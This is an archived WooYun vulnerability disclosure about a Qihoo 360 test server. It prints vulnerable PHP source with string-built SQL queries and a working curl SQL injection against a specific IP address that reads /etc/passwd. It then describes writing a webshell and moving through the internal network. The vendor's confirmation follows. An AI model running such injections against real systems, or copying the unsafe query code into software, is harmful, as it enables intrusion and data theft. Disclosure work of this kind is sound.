当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122949

漏洞标题:神器而已之奇虎360某站GETSHELL内网漫游到webscan了

相关厂商:奇虎360

漏洞作者: 举起手来

提交时间:2015-06-26 16:47

修复时间:2015-08-10 18:10

公开时间:2015-08-10 18:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-26: 厂商已经确认,细节仅向厂商公开
2015-07-06: 细节向核心白帽子及相关领域专家公开
2015-07-16: 细节向普通白帽子公开
2015-07-26: 细节向实习白帽子公开
2015-08-10: 细节向公众公开

简要描述:

一个小问题导致的,这次不去吃饭了。漫游完再吃。妈蛋!

详细说明:

首先是这样一个问题:
http://220.181.150.107/web.tgz
一看就是源码啊,下下来审计一下;我猜有注入:
➜ web cat web_function.php 

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../db/db_function.php");
function verifyed($short_code, $token)
{
	$state = NULL;
	$pdo = connect2db();
	if($pdo == NULL )
		return 1;
	$sql = sprintf("select * from receiver_reference_count where rev_jid='%s' and short_code='%s'", $token, $short_code);
	//echo "sql:".$sql."\n";
	$result = $pdo->query($sql);
	if($result === NULL )
		return 2;
	foreach($result as $row)
	{
		$state = $row['state'];
	}
	//echo " state: ".$state;
	if($state === NULL || $state  === '' )
		return 3;
	else if($state == '0')
		return 4;
    return 0;
}
function get_nickname_by_short_code($short_code)
{
	$jid = NULL;
	$data = NULL;
	$nickname = '';
	$pdo = connect2db();
	if($pdo == NULL )
		return 1;
	$sql = sprintf("select jid from short_hash_jid where short_hash = '%s'", $short_code);
	//echo "sql:".$sql."\n";
	$result = $pdo->query($sql);
	if($result === NULL )
		return 2;
	foreach($result as $row)
	{
		$jid = $row['jid'];
	}
	//echo " state: ".$state;
	if($jid === NULL || $jid  === '' )
		return 3;
	$result = '';
	$sql = sprintf("select name from ofUser where username='%s'", $jid);
	//echo "sql:".$sql."\n";
	$result = $pdo->query($sql);
	if($result === NULL )
		return 4;
	foreach($result as $row)
	{
		$nickname = $row['name'];
	}
	//echo "name: ".$nickname.PHP_EOL;
    $data = array('jid'=>$jid, 'nickname'=>$nickname);
	return $data;
}
function get_play_time_by_short_code( $short_code )
{
	$time = 5;
	$pdo = connect2db();
	if($pdo == NULL )
		return $time;
	$sql = sprintf("select play_time from short_hash_jid where short_hash='%s'", $short_code);
	//echo "sql:".$sql."\n";
	$result = $pdo->query($sql);
	if($result === NULL )
		return $time;
	foreach($result as $row)
	{
		$time = $row['play_time'];
		//echo "time:".$time.PHP_EOL;
	}
	if($time === NULL || $time  === '' || $time === '0')
		$time = 5;
    return $time;
}
//echo verifyed('bXhRdzQWj1JYDmos',"13438299142" );
/*
$data = get_nickname_by_short_code("1dhg05myYabJI5CO");
if( !is_int($data))
{
	print_r($data);
}else{
	echo $data.PHP_EOL;
}*/
//echo get_play_time_by_short_code("QgHUkVoFE7mhSD9P");
?>


一看就是注入,但是按逻辑走着,入口在get.php

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../libs/util.php");
require_once("gen_html.php");
require_once("web_function.php");
if (isset($_COOKIE["token"]))
{
	$token = $_COOKIE["token"];
}
//print_r($_COOKIE);
$query_str = isset($_SERVER['QUERY_STRING']) ? getParams($_SERVER['QUERY_STRING']) : '';
//echo "query_str: ".$query_str."<br>";
parse_str($query_str, $tmpArr);
//print_r($tmpArr);
if(isset($tmpArr['s']))
{
	$short_code = $tmpArr['s'];
}
//echo "short_code: ".$short_code."<br>";
//print_r($_POST);
//////////////////////////////////////////////////////////////
//for Jump the page
$mobile = $_POST['mobile'];
$post_code = $_POST['code'];
if ($mobile != '')
{
//	echo "short_code=".$post_code."mobile=".$mobile;
	$ret = verifyed($post_code, $mobile);
//	echo "ret == ".$ret;
	if ($ret == 0)
	{
		setcookie("token", $mobile, time()+3600, "/", null);
	    response_picture_html($post_code, $mobile, $dir);
	    exit();
	}
	if ($ret == 4)
	{
		setcookie("token", $mobile, time()+3600, "/", null);
	    response_ad_html($dir, $post_code);
	    exit();
	}
	response_verify_html($post_code, $dir);
	exit();
}
//////////////////////////////////////////////////////////////
//print_r($_COOKIE);
$ret = verifyed($short_code, $token);
if ($ret == 0 )
{
	setcookie("token", $token, time()+3600, "/", null);
	response_picture_html($short_code, $token, $dir);
	exit();
}
if($ret == 4)
{
    response_ad_html($dir, $short_code);
    exit();
}
	response_verify_html($short_code, $dir);
	exit();
?>


配合这个文件

➜  web  cat gen_html.php 
<?php
    $dir = dirname(__FILE__).'/';
    require_once("../libs/SmartyTemplate.php");
    require_once("../libs/util.php");
    require_once("web_function.php");
    function response_verify_html($code, $dir)
    {
        $tpl =  'template/verify.html.tpl';
        $objSmarty = SmartyTemplate::getInstance();
        $file_tpl = $dir.$tpl;
        $objSmarty->assign('short_code',$code);
		$url = "http://220.181.150.107/".$code.".htl";
        $objSmarty->assign('thumb_src',$url);
        @header('Conten-Type: text/html');
        //@header('Cache-Control: no-cache, no-store, max-age=0');
        @header('Cache-Control: no-cache, no-store');
        @header('Pragma: no-cache');
        @header('Expires: -1');
        returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
    }
    function response_picture_html($code, $token, $dir)
    {
        $tpl =  'template/picture.html.tpl';
		$finish_url = "http://220.181.150.107/".$code;
		$counter = get_play_time_by_short_code($code);
        $objSmarty = SmartyTemplate::getInstance();
        $file_tpl = $dir.$tpl;
		$url = "http://220.181.150.107/".$code.".htl?jid=".$token."&type=normal";
        $objSmarty->assign('img_url',$url);
        $objSmarty->assign('counter',$counter);
        $objSmarty->assign('finish_url',$finish_url);
        @header('Conten-Type: text/html');
        //@header('Cache-Control: no-cache, no-store, max-age=0');
        @header('Cache-Control: no-cache, no-store');
        @header('Pragma: no-cache');
        @header('Expires: -1');
        //writeLog($file_tpl."  why22222222222222", __FILE__, __LINE__, DOWNLOAD_RUN_LOG);
        returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
    }
    function response_ad_html($dir, $short_code)
    {
        $tpl =  'template/ad.html.tpl';
        $nickname = '';
		$jid = '';
		
		$data = get_nickname_by_short_code($short_code); 
		if( !is_int($data) )
		{
			$jid = $data['jid'];
			$nickname = $data['nickname'];
			//print_r($data);
		}
        $objSmarty = SmartyTemplate::getInstance();
		//echo "nickname: ".$nickname." jid: ".$jid."<br>";
        $file_tpl = $dir.$tpl;
        $objSmarty->assign('nickname',$nickname);
        $objSmarty->assign('jid',$jid);
        @header('Conten-Type: text/html');
        //@header('Cache-Control: no-cache, no-store, max-age=0');
        @header('Cache-Control: no-cache, no-store');
        @header('Pragma: no-cache');
        @header('Expires: -1');
        returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
    }
?>


最后得到这样一个注入点;

curl http://220.181.150.107/web/get.php -d "mobile=13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;&code=1'  union select load_file('/etc/passwd') -- ;"


接下来,sql注入写文件,拿shell

hosts.png


内网漫游之偶遇webscan.360.cn

3689ED9B-89B5-419B-A184-3A83D7D6EA57.png


A63F1E3E-74A9-4738-90FF-FF52557F8324.png

漏洞证明:

就这样吧,点到为止,shell已删。

修复方案:

然并卵!

版权声明:转载请注明来源 举起手来@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-26 18:09

厂商回复:

感谢您的反馈,这是台近期准备下线的测试服务器,目前我们已做下线处理。

最新状态:

2015-06-26:确认测试文件存在SQL注入漏洞,成功利用后可以探测所在IDC机房的部分机器,再次对白帽子表示感谢!